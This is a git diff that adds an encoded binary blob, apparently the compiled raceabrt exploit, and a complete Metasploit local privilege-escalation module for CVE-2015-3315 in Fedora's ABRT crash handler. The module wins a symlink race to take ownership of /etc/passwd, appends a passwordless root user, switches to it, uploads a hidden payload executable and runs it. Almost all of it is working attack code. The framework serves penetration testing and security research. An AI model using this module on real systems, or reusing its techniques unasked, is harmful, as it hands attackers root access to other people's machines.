zI*^!Lj?3-HO`+q=B1o=hQTJ#A+MEyOHnA!b1fF$-FVSSbK~A!aJ|hnOh|d=z39v=FnPg}ntW(k$rwk!I=) zwEZ)YW@5)5X=X_+(#(?Ik2F)fTz`3_ISEBqiZn9}TBMow)c!~_mHH#i)bPI@X(l}X zOr)7Q`yYrj>%S9e*8h`{W(qW1Dbh^rh@Aev5ospI^ql^`iZp8-YLRA22O`as4n&$M zeWge83nW0ECW&VLkGl307nkh3B zX{O9jq?s~9k!H#aMVcuSj5Jd&7-^(o7Bit4Oof{eLggOl|+SN1F94(oAE(BF)6Ijnn_b zk!EVhBF)q=g46#Ok!B{z|HYAJ;x7`_ObsKnNHaZ( z^+%fjjHIANnguP=ENGEtL5nmC|HmTDESedNG!uC~PX9L}&F{c(;-`dA=rQ0a@lQ=g zp#?!xt(@FugiQk(aUxaU20tYg`1xrelQNNi1YYK(Tab925_6ECXE&1x#F~wq^&YyE z;WC9>Wb%WiY(c_KiHDG&2N6>qLxNo1DNo~41SfRL?~zC~BC#C_`XKC-b|hY+1bNFg z909SCw>*`a9RN`c=yA%&$ecsfl+#Fr`rmq+Hau=Th>EzOxN+Q2+&E5)8&h?BFm4R~_KsQH!e%Ff7JZ2N-UYjwe^)ssnu00frj< zf9a^jRR{Qg;;03=gI673xS5w7wfF#@9zT{jzyVK*e`+QQDQ>Kl`{Txej7YKI@vMav zuH_^GuESx*wU94=O~~XG$j?K?Wb%uPDM5bmjW~O3C6FofvF0gj>0-xa>SkP4Nk~wf z_#H}6toX)}NKm|({-MvQ6f-Wv5u~XUGk%s56f^Fo1bM+lpEgzl7!krch@1+Un*?4Tc}oPLKwlBmUW!8( zv1mVXA^@WN9fAz4!%?HqA|fIHZ63ktManE1m5esg$P(55>}UoY5&$0KuLUv!jv1B> z!FjDQekR9VMpOt9HGZg9mW}oI>PK|V7@kqY>aGpe;n317{?@UY9Ep9Bd}_?k7K|mF zmJp3}AkoF(VG1}UPAH4PnRE@GG-?IEa!h{29UyLU2$#glt(1U5N1zG{Jcs3`(T!Tg zMW7Y+0_~jzK@mRc*uq3RJ=h~2Wd!@f0h|aP!oI2_cwjY5DX!|sKcyou9(v7q2tmto z)sFa$+y85JGK?Ts5W-SB)7=HRutdj(Z2|3eSHNIRaOntue^Y znl)Sd-(FKxfUllZ;QK%LVp~Po>NQ39dfQrjka(r^gK6|~>UNN(X zeY|LW;W|`1@tK?1_$W<$v4czS8Sa1GYM>V)#~yBd_t$Ds>(6Dtg@)WSzPje z1SviK6ay}@Qo0QiSGI)tr%%fO2#H~ssPCHiMJZ%a(gTBcXIv-)?q z`}Lz2%XRu^wup;w)`#c6u5Z}#+>$@Y`q%hv;spKjcWcirS@ZhNMDfNAKfPIh*Ipey z=Ef&q)fkNW|6+}yGf4W+p)muSRxHs!426-CpfRIM^@q5Z^~S~eues7Cb^3?5JO`cG z_A7nFS^d|Wf4SrjYxGC>=fs)%9b5M9-??U|II(9*lRlz!=XrgNSo*cj2;HHV4zF69 z|HZmP590LCg!B3jH;JWL`VpmMO}6P4>tEk2&eM-#R%VyJ;C}sI_{I89HodI>h3}awQ$t}Z{gY6aFQ6{7nU$HP_dzudZx%~6b=lUe z-^$;wKfg(|kcs&*RwnaKn3uI{$hfRIuRp;p*8g;i7^PVlS~d%4`7Efe!htz__HgO# z>2nIQvoi`-WZag`6_?eP!O>WVefL*PHTtWm$`s5&;EiS@XeiHdm2UP=xO`mK50WrDKl1X2?Eih%Zmt z%hpuln|*YsFu*OV_OqOoaohZ~J2YnSZO&4BOL=XO`PV01$CXw? z)`i7zpla|H;i~Eayd7;v2lU0~TJ%Y!cCMhfs?t$_Pf!-%lY%7$Yw;bx0~(iQeJZ|Ll3QjY}M zHeNhA!99+V-JZWT80#+-rKx1>x_QNT>pHI zEDTz@bo5A7wf*Z{RaNc%u-W6&A?)q-U{F;(JTY0#UUhI+HA>SB*j)ZuJ)Gl`&FW#@ zrN<@MY-SA~`&u@>)rZ7RXA9YZ>{zxqd(LQfh}$F+?P+Z4YwoT~N32Rm)Tbj>tN(QS z>tx=jybv%zL)}gpuyy7yz#fZOLbjO5+Ow&R>e@RydaYR*GuPb0O|4;)Q3v^r;qeeL zIgT!{QQ994=$gQO-9g)FN0Kpu!wsNGohp+tQ&h;Ux))<61A(!yL&vH*v1Lfq zhLW|?a8oDIZOuUeh4$x7q%|%*giHjzZ9U<}&fdlbKM%&1)79M3yJ<^15kY2RI?J7g z!Pu(gtik2Hp{9WBOt>!8eZB#TyLe#Ck5Mc~qhEtF8k?rU+u|Y6-q3S?*xcu*$GG+l zo!!l=0+VbSzd@>?L%6s#F#NIAY9eWHI^xD*t`E(GJXguWdpj8)zG>vnay#S1B=_l# zOla~BxoB5(LM=_3RFR+gh8gO`c)DSRq41Gew@k1m*q+hkv37MhUeJTr2 zJTRa;NTU^@V2wdjuI+<~Nv9aDmz6jy3$CAxNyXaO-eK&!X)6*;4HgY^T5@BlJk!Qg zUC^kugsgbEK`c&F47S4rW@cw&>Xs^uW`~O*H|u+yDPLTBV`oQ4b6Z=Y)sar^Tt8m4 z?P2*t4Tmg%#{4yJ#Pe=ka8E-=(*=#)o0>K@Yi_r~$aXE2FtF9uz~Zc07R(5=V?k>N zGcwm2C*|%%Ypa52>Gy-clx`)C3+(7*8f^%Q7n`|WmOK*-7k1~lB3Rmp+7ZyaL8jD# zUEgzdwixQ4#gImejOdPVv$YDVRr7$(Fvw4G^YsvxMqkIZx19}ok9nGx`ZO!dLgIOJVG#2gR&I_A7Ta$qTYXjF? zGrtukf(>n*jg8IS&5qexogE3`H?hnlp-|t=gD~`cLw(~pUOM*dbVnC#4(LBySkvq%p}HcjH2?I z3R3fby!x1(Q^Mfutij7%LPxtEVL+QbOTF8`$X3|OxVS1_?$qKJ1hw-D4;p&kHiggO zOM@d{nHMp_d!PluzHN}kRq?3|Wx>8+|3a}ph(9tY27g$%;>7v=yb!joir{T{7#Hqe zC`$LMRs=5uhRs)GlSwgdjL&I2KexEQtb2c%?xNMH5|1H`+rX!ICBD*Cn&?>K+Igak z(|LZSmjqk&%2M|UL7q*p!IG9O2$~^A4P%clvn1$IkuTZU3ix$pPD#+MU^^bw>`*8* z!3>{qZw9W#SD=^j>0tT1s@sx`@SLp>w$d%C^i%kfV9Tup-?OBG`wZDFQQk-)FsOpl zEU7>@Pa%~8NrNP@P`Yf$xFw|Me%gebI&!leUlMewW>vc&sGEO)(5kd(YO%$4DbR00 zQ@?^9d}%Os*}Mo_EiVhL^98F@)Pj5PRHDH4MW5vhf)^pGOrc#0q_y&3As0NH5Gl=L zpJhM9b@(H&mClv(A|-iA&?gP41W2!O$XFLqt#MO$TV-7w)#am>L7a|PD-`M?78-vE z!4E8{;5T?PUPR~)F<79CQ?85fn0f2|h01t!gl>aUewzkioa(H@+kqjf9v_VxU*VzS zM#EG6=*Nkw%q6hYqw0Km0V!wj9+PC8hN<$F2mgJ~v4p;*9{U!0Y%=lT^D!J+eIrHt zCW`jF8jn_cJ-RUIop>x#(pcR^gGlp*gkiLLIUps1{>K1$BtfSo3bS|$@#4e1gN(+t@F`)PpjH!`rHLDDtb$J)vQNR?HdcY;U^`x z%S>H;`u^)Vw%T(E8VuR3Kmt*lg58GP>g6Jq0*reTDJx8BmjYW-G>C@av3jgE<5GfY zMu}^R23L|*Y*x3m^X-(XdNt@wjeNX}SH(0+feZyzMT?TU>3#SkFnT5gk^hKCu?k$L zwMrc?*k}c=kjO4KQmE>tj#z|!y%ObsjaKkcy!!NdLTj&4+v5VdR6qvLGVv}>-XGnh3aw?Frv^hk1kujbMer;MawkTEjBD`AuiXsre zIE`{`CyrpGumXvcdf3>=q9iAz@7t4u*Cb#hA6dOVW(Gx26kVB!_6X_leRszHQ69X?)0 zgog1xi|7%2ltn-?#aV==@ji>_%MIRaDiQsuM7rp&;-l40K+TDZ^bLw*NH$JQs>YWG ztYtm>%S6}UD}=Q?3AiS?wMR(i;I$}vhsP8lT3aDsr05JjDpJ5T*%c|ICu3ivXzdG4 z5j-`E{-DQHA^O7x+ox*LAMxq%i`JUvMG*Z%d?bQ^Q;`!Pp&}Opi*ZuX3Otjdnywy% zR3NdLOc(kdBU+s$=~%-Qs4Iw7@O8YH72a;66-WxAxB2=-6J?xgmPxUodCMYsk))8> z5bdo;(UL;8K(vC-;}xw?l@RUgfF#1Wzva_5u1~?KcvfWv>PCi3uf z>{DP{+^yilCbmn#ONQ)=YmHWtH<4m%)$gFY2lj3m(oQ_Hg93FrvM6}JA$t_qT1{2z zWf**ClTH16FP?UnDSXIqbSZcQf3%kMeLD`6XkjV@%jOmNsNv~W@M}YER$w*O9m~F% zNaMcE=i_*~Re=~6X=(H2&ig!v#=>TtI(H{t>r7mImq~L;)~sshe-2jh$@StB;0N)v zTY*j9x5L*-!_{HNZRGPj{1L%!&EO(cva`%jT2g^4q&HEB9@C6_oKML?eO??IF3ywj z#451wV74aS+t|!jQ8v3-NnbQ2^~Bk`l-<7e>4~#P+Sma97=ADQApUv$2syla8-yOt z=I}mU&oJKo4aD2=U3l#b=kQnIZ@{li@yX`b<9FiocxgrJhZX|w_CmZ`yiZSsKXSMf zMalg+!hDYd*XD}m#t?&bN4^|)Rh#f&gpV-z`3RRATx*MgzrtYMgD+Rg)Gzl$gpV}1 zR#P#qlr5Fqy30%eew`uKM|hFJtr32`!Tyf@QupJd&qV1*+k)n7Q0jgtv?{_&Ou`cp zuC$Eqvots+g^x|)H>U8?6jn#at~59<22iEu*9qdNQhtlnsnSH21;2g8YRK{kO9HQ- z67+Kt*z2c+5nl@)bNVbnpEA{hwi_9+73SS*RT+^uVU7D-0#AUY56Mx&)y$gaeg+nc z@HK>0w%bkqkAR;hT`g03THa3*|900OlJ|??GqgzIB;U6P_d0u!JRR1AOuE{;4@y4~ zD|wWD4fIj?bq;%5RtE7uPAL0Q&zB&LCe7!;R{kT+W7O{xcp(M7IS>lz)*M8;TR&luFktUhkCt&J@# z@!yxi|DM86r?9>U?VZ~HTq^y=6sFOU6aNFwb`>dnq8l3?ADQC+6;sUmIse?XB&a0) z*vsSgElu&C2tI*yjZ=+>>QuVEm0QE^=BuQuKh}ev0&BStZUMI+Zy(cy+rjS#uXO3U zZ~iv$XB^%F-on1+AT}rd9pKz{bWXbZYY4o8%#YD8O3#7kNY@;$bX{$Ip$a#yBDe%x zq0P0!SAsWdH|DS|I1dx}8u0B2ycc|Z0)H4hn!wkCFHYcj@Ou*YCh&(6__N@f6Zkgp z{R#YK@Q)MtYvAwc0m#YwE%3h6V|*9*!bJK#;7b$uAo!^2nEzq$XA=7ODfpX-^#24u zmPmgZY<`!+)&DGbB*FiC@Uv&c<^Ku%Vj@3_LU2zay&Qa90xtsJlE9VV+Y|UW@J|x> z&0z0j@295lsuVsug_}~iBZar6@IVTWrSNPDUj;sWt#*UfK0laBpHE@UXH)QNn9H8O zl1je|tlz3(iZbcccrj?`^G!ve-xZOm-!35N*_5NOXzEe> zf0attk4ku__WwDB%TxQOqf=NvgW;X>x2N#+sq)m`1MP8pSEu;(J2~E|yp|N+0=})2 ze;>l6_Ur`rUg5`MWw0y7e=Zx1ZKT`%MrE*@^qmR*i&Ol%u+%%%fA#+p`?3_OyaSZy zpD#*yzR(p%e*ev(?BF)AKh&@GeGTkyxf1?PivOV${sq`{HbDui_McPf*Rr?Vc^+ee z^phy>@kN})XMVfV;iDPXFY(x-f6rEuUIo6Ro;@k)!YjeL(@L(Ab3t|BmN)3FzfIru z`XKlZ{BnoSC4DXBo#OCDu>XAs|4raCdCX#qW7>ZUxPkiQB+s4TOqYHJ#O8khd{#3& zF8xvPoU@-L3n~NsM9&fH?EXsi>E}fBn{CTn{@;Rs!~Ev4e&p(((Z`7{{U{9cvX&tD zhQr5!*U{b!9X=U+*2W-U3N!7g1%D5HOJvoz7F_W1gUwn!@P1@Prz&+fOF_m_N4r0flp(8JJsP^(NFE=c7Bq5ca#1M?SsY0 z|1R(&iTX3(0~oJKr#xLI=kxQl5KNL@4*$Dd`P1OLDNj!IUkUy-_I`rH9{|r_KWe|y zZvqz*NDQg=2X#EiX=SlbaRsZ~q^z)b>RyuhGN#6}-iZT3o@Kwm`^{L;M@$;$L z^D*!@6aDc?rElULfGbbeq9p6n?I?|j{+6pHtKbJ|j~}1k1oOpn<0Q|6;Dd7( zFGixr!Jqf(l)st!7NEbAV3E9+Vjub~&JWQh;a|Z2GRD;C(tii`??)sbQ)X}l^C?rh zX}@guG3@hh$A2{VW0a*TCC^gubufGTS_b|ooA>J+{|@SZn9ljQ!>5p5OMhs{D*qa= z-%qOk25^q`TP7)a4}ksq)5YwHLe`_*l<)1mmGm#+haG_=q=z0Wbos0 zJNP~duX6mu;A_y=GKXit`cyqAI>#NM{K^bdgj`!~sZJvg(}eyc(Fb6~$-Oa3o_ z$EnZv=d;Li5M$7n2gU#WM1JxA0DMuR{~rd&{k`9_;N& z?b!(a0`~CtuKW&g*V)(vWvIMuU~doN?+5SgwqJ3QJ+x5Y-?iK4Kk;8gI+v(K>(_4R z`;eI}iYf0(@blQqki%Dl^>11AzsCQKU_T$KyiMri8^kSl{5L~iRT;PM>);zZbi1=H z|4#4|=v(D!y+51$A8U{8^Ip=oH|brr<$nsippH4k<$nh3`&;$@0qo_|d|8g|y}?+a^xagrKHFP;+b8(%sPB95yy@+|&UB--q`{ z{)*!|_A$X1#Q7TkWH`bR5RL>5anh*}_D{{Yb0x*hP|cdUHFbd!!tBtDP<=3*?;p>E zLsR49vjLYNa6pRqwfb_m5vQ3i_)8jFxkqs=I!|S5$@dRt`UmnwnzE~bu*)3M33j#j z&oobGCW?(y!@;gC6WqD5tD#uTjB`mquxmq}158bsvHn?9!4bJks3O9QGN?KFTED)& zPTV-xJy5ohw9b6rAC%<`TXuLBDwiKDjuB>NGJ`&xc6d4iF+7>yMZj4ZDu>w9pDpIH zLr~@*AtC1nsHLzg=+AM$LIful`UiDDjMS+KMd_Fy#}0@e8sgjs@z83_Y=rdnda)|4 z*e{mh+!Qw=5bnumi;^YBVTQ@PVbHk-hyk=y9M5qK1i-nHOrAqRHFc|3uMVb%a~v@& z%0@U-!*Rk94lHuiFyPpcPN3+(Q;zeAiX6@bGeg-C-7#S^aiAcNyvTuh)U>TycNU-Z zXK|{btscJ)U#Fy~fb>DxiLi^3@}> zXl1WoWvW_j^4700@#eGMq}Hq8`g)sc^48PfLeyYR9u1D?jH2=!e6++^M*Tt3#Gp~H zp*+__#5Q61LJqP_4C#CgnL?eF(m|1M(3CnjmgZ9WE_6$d#PnUO&; z#5hEU&doI$;1PF3Z+fUO84gcPU_gU|oa%!Yt|?<$Di~at9hcohO_>28qA-@pNQN+U z2i**`#ITaXGOTT2oEr+sNTA&PaB)wDdIhhP@4qZOvLsjE!41 zpVQ9sezw)v)-mU3wEB78WUcd4H|g%wn$ZOFpw3?pMe_&g&Zxt|sl2aPRmCN9Zjhsv z@f5DA&FC@1Z|!P0IdoRTfDUsUl^o?w<2nUXJ-ZPp81T`s+GVx-KcBW7zXwgl!{mhJt z(RpCoYaBG5%+0z<&5kw=zC*fR)%e-^kg-C7AK8#*Hxw_@#Au)qc-6~VH5(G;R2)uZ zGDDoCHKSYuilk|$l(o<@0Nb3rnnBEAS{PEZ{rn9XuO4Qw$+EO0k>cBss_RKwyI9~W~rhezaxS)ij*OlS>J6@W4ob2uc{uiI6H2) z?+L;Tr{FcJkulyXf$gZWlAA`_O*JWqoY=e=Ry+NMV>TZQetL+uyW!EhUA^DaGrjWb`+)L# z$K{=P<#^QRzs#0T-xD<6VFFVguk78i1AX$w!)LkMzn%og!USJJU}jW5{4ogRDH6(-al%soKA@qStVPyH#r X48It!F`g{1_P=;v$Gbc4e0l#1xRD;i literal 0 HcmV?d00001 diff --git a/modules/exploits/linux/local/abrt_raceabrt_priv_esc.rb b/modules/exploits/linux/local/abrt_raceabrt_priv_esc.rb new file mode 100644 index 0000000000..cff724bc03 --- /dev/null +++ b/modules/exploits/linux/local/abrt_raceabrt_priv_esc.rb @@ -0,0 +1,189 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ABRT raceabrt Privilege Escalation', + 'Description' => %q{ + This module attempts to gain root privileges on Fedora systems with + a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured + as the crash handler. + + A race condition allows local users to change ownership of arbitrary + files (CVE-2015-3315). This module uses a symlink attack on + '/var/tmp/abrt/*/maps' to change the ownership of /etc/passwd, + then adds a new user with UID=0 GID=0 to gain root privileges. + Winning the race could take a few minutes. + + This module has been tested successfully on ABRT packaged version + 2.2.1-1.fc19 on Fedora 19 x86_64 and 2.2.2-2.fc20 on Fedora 20 x86_64. + Fedora 21 and Red Hat 7 systems are reportedly affected, but untested. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Tavis Ormandy', # Discovery and C exploit + 'Brendan Coles ' # Metasploit + ], + 'DisclosureDate' => 'Apr 14 2015', + 'Platform' => [ 'linux' ], + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => [[ 'Auto', {} ]], + 'References' => + [ + [ 'CVE', '2015-3315' ], + [ 'EDB', '36747' ], + [ 'BID', '75117' ], + [ 'URL', 'https://gist.github.com/taviso/fe359006836d6cd1091e' ], + [ 'URL', 'http://www.openwall.com/lists/oss-security/2015/04/14/4' ], + [ 'URL', 'http://www.openwall.com/lists/oss-security/2015/04/16/12' ], + [ 'URL', 'https://github.com/abrt/abrt/commit/80408e9e24a1c10f85fd969e1853e0f192157f92' ], + [ 'URL', 'https://access.redhat.com/security/cve/cve-2015-1862' ], + [ 'URL', 'https://access.redhat.com/security/cve/cve-2015-3315' ], + [ 'URL', 'https://access.redhat.com/articles/1415483' ], + [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211223' ], + [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211835' ], + [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1218239' ] + ] + )) + register_options( + [ + OptInt.new('TIMEOUT', [ true, 'Race timeout (seconds)', '900' ]), + OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) + ]) + end + + def base_dir + datastore['WritableDir'] + end + + def timeout + datastore['TIMEOUT'] + end + + def check + if cmd_exec('lsattr /etc/passwd').include? 'i' + vprint_error 'File /etc/passwd is immutable' + return CheckCode::Safe + end + + kernel_core_pattern = cmd_exec 'grep abrt-hook-ccpp /proc/sys/kernel/core_pattern' + unless kernel_core_pattern.include? 'abrt-hook-ccpp' + vprint_error 'System is NOT configured to use ABRT for crash reporting' + return CheckCode::Safe + end + vprint_good 'System is configured to use ABRT for crash reporting' + + if cmd_exec('[ -d /var/spool/abrt ] && echo true').include? 'true' + vprint_error "Directory '/var/spool/abrt' exists. System has been patched." + return CheckCode::Safe + end + vprint_good 'System does not appear to have been patched' + + unless cmd_exec('[ -d /var/tmp/abrt ] && echo true').include? 'true' + vprint_error "Directory '/var/tmp/abrt' does NOT exist" + return CheckCode::Safe + end + vprint_good "Directory '/var/tmp/abrt' exists" + + if cmd_exec('systemctl status abrt-ccpp | grep Active').include? 'inactive' + vprint_error 'abrt-ccp service NOT running' + return CheckCode::Safe + end + vprint_good 'abrt-ccpp service is running' + + abrt_version = cmd_exec('yum list installed abrt | grep abrt').split(/\s+/)[1] + unless abrt_version.blank? + vprint_status "System is using ABRT package version #{abrt_version}" + end + + CheckCode::Detected + end + + def upload_and_chmodx(path, data) + print_status "Writing '#{path}' (#{data.size} bytes) ..." + rm_f path + write_file path, data + cmd_exec "chmod +x '#{path}'" + register_file_for_cleanup path + end + + def exploit + if check != CheckCode::Detected + fail_with Failure::NotVulnerable, 'Target is not vulnerable' + end + + chown_file = '/etc/passwd' + username = rand_text_alpha rand(7..10) + + # Upload Tavis Ormandy's raceabrt exploit: + # - https://www.exploit-db.com/exploits/36747/ + # Cross-compiled with: + # - i486-linux-musl-cc -static raceabrt.c + path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2015-3315', 'raceabrt' + fd = ::File.open path, 'rb' + executable_data = fd.read fd.stat.size + fd.close + + executable_name = ".#{rand_text_alphanumeric rand(5..10)}" + executable_path = "#{base_dir}/#{executable_name}" + upload_and_chmodx executable_path, executable_data + + # Change working directory to base_dir + cmd_exec "cd '#{base_dir}'" + + # Launch raceabrt executable + print_status "Trying to own '#{chown_file}' - This might take a few minutes (Timeout: #{timeout}s) ..." + output = cmd_exec "#{executable_path} #{chown_file}", nil, timeout + output.each_line { |line| vprint_status line.chomp } + + # Check if we own /etc/passwd + unless cmd_exec("[ -w #{chown_file} ] && echo true").include? 'true' + fail_with Failure::Unknown, "Failed to own '#{chown_file}'" + end + + print_good "Success! '#{chown_file}' is writable" + + # Add new user with no password + print_status "Adding #{username} user to #{chown_file} ..." + cmd_exec "echo '#{username}::0:0::/root:/bin/bash' >> #{chown_file}" + + # Switch to new user + vprint_status 'Switching to new user...' + cmd_exec "su - #{username}" + id = cmd_exec 'id' + vprint_line id + unless id.include? 'root' + fail_with Failure::Unknown, 'Failed to gain root privileges' + end + + # Remove new user + cmd_exec "sed -i 's/^#{username}.*$//g' #{chown_file}" + passwd = cmd_exec "grep #{username} #{chown_file}" + if passwd =~ /#{username}/ + print_warning "Could not remove the '#{username}' user from #{chown_file}" + end + + # Reinstate /etc/passwd ownership + cmd_exec "chown root:root #{chown_file}" + + # Upload payload executable + payload_name = ".#{rand_text_alphanumeric rand(5..10)}" + payload_path = "#{base_dir}/#{payload_name}" + upload_and_chmodx payload_path, generate_payload_exe + + # Execute payload executable + vprint_status 'Executing payload...' + cmd_exec payload_path + end +end